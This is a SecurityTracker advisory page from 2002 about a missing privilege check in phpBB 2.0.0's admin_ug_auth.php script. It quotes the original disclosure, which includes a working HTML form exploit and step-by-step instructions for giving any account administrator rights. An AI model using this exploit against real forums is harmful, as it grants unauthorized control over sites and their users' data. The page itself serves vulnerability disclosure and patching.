SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpBB Vendors:   phpBB Group
phpBB Forum Bug in 'admin_ug_auth.php' Lets Remote Authenticated Users Gain Administrative Privileges on the Forum
SecurityTracker Alert ID:  1005495
SecurityTracker URL:  http://securitytracker.com/id/1005495
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 29 2002
Impact:   Modification of system information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0.0
Description:   A vulnerability was reported in phpBB version 2.0.0. A remote authenticated user can gain administrative privileges on the forum.

It is reported that any remote authenticated user can POST to the admin_ug_auth.php script (which is used to set permissions). According to the report, administrative privileges are required to view the page, but the script accepts POST data without checking the user's privileges.

A demonstration exploit method is provided in the Source Message.

Impact:   A remote authenticated user can set privileges and gain administrative privileges on the system.
Solution:   It is reported that phpBB versions above 2.0.0 are not vulnerable. New versions are available at:

http://www.phpbb.com/downloads.php

Vendor URL:  www.phpbb.com/ (Links to External Site)
Cause:   Access control error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Privilege Escalation Vulnerability In phpBB 2.0.0




Privilege Escalation Vulnerability In phpBB 2.0.0
-------------------------------------------------

Rootsecure.net recently found a privilege escalation vulnerability 
in "phpBB 2.0.0" which allows any person with a "user" level account to 
escalate their privileges to that of "administrator" level, and therefore 
gain full unrestrictive control of a forum.

A coding error exists in the admin_ug_auth.php script (used to set 
permissions), which means that although admin rights are needed to view 
the page, anyone can post data back to it "no questions asked".  
Therefore, if you already know what kind of response the board is looking 
for, you can go straight ahead and tell it directly that you want to give 
admin rights to a specific account.

Demonstration Code
------------------

<html>
<head>
</head>
<body>

<form method="post" 
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

Before using the sample code you must first find out two bits of 
information:

1. The base directory of the board, (usually something like 
http://www.mydomain.com/phpBB2), which is found by taking off index.php 
from the main page URL.
2. The user number of the account you wish to give admin.  To do this go 
to the forums member list page, click your username, then note down the 
number shown at the right end of the URL you are now at.  (if no users 
have been deleted from the board, then the number next to your username 
on the members list page under the "#" column will also be your true user 
number).

When you have all the information, ensure you log out from the board.  
(otherwise, you will get a permissions error later on).

Now edit the form action in the demonstration code above to be the full 
location of the boards base directory plus the location of the admin 
script.  Usually, this is in a subdirectory from the base directory 
called /admin/.  Your result should look something like this: 
action=http://www.domain_name/board_directory/admin/admin_ug_auth.php.  
Save the changes to your page when you are done.  

Next just call it in a local browser window, typing the user number you 
obtained into the user number box on screen, and hit submit.  On your 
next login, you will have admin rights.

Note: phpBB versions above 2.0.0 are not vulnerable.

Additional information along with downloadable versions of the exploit 
code in the form of a static HTML page, and Perl script can be found at 
http://www.rootsecure.net?menuitem=exploit_code

______________________________
http://www.rootsecure.net/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC